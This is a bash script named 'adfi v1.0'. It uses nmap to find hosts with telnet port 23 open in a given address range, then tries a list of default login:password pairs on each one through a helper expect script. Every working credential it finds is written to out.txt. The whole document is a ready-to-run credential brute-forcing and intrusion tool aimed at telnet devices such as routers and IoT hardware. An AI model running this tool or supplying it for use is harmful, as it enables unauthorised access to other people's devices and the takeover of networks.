#!/bin/bash
#import sys;

echo "Start adfi v1.0"
echo "Source: https://github.com/dvoropaev/adfi"

function scan {
	echo "Scanning $1"
	list=$(nmap --open $1 -p 23 | grep -o -E '([0-9]{1,3}[\.]){3}[0-9]{1,3}')
 	for target in $list
 	do
  		echo "Trying $target"
  		while read logpas
		do
			array=($(echo $logpas | tr ":" "\n"))
			login=${array[0]}
			pass=${array[1]}
			echo "Trying $target $login : $pass"
			./try_telnet.exp $target $login $pass 2> /dev/null > /dev/null #  | grep -e "FOUND" #-e "Trying"
			if [ "$?" -eq "9" ]
			then
				echo -e "\033[31mfound $target $login : $pass \033[0m"
				echo "$target $login : $pass" >> out.txt
			fi
		done < defLoginPairs.txt
	done 
}


while [ -n "$1" ]
do
 case "$1" in
 -a) addr=$2
     shift;;
 -i) input=$2
     shift;;
 -o) output=$2
     shift;;
 *) echo "$1 is not an option";;
esac
 shift
done

# If specified a file for output, we make it empty
if [ -n "$output" ]
then
 	echo "" > $output
fi

# If the range of addresses is transferred in parameters
if [ -n "$addr" ]
then
 	scan $addr
fi

# If the range of addresses is specified in the file
if [ -n "$input" ]
then
	while read line;
	do
 		scan $line
	done < $input
fi
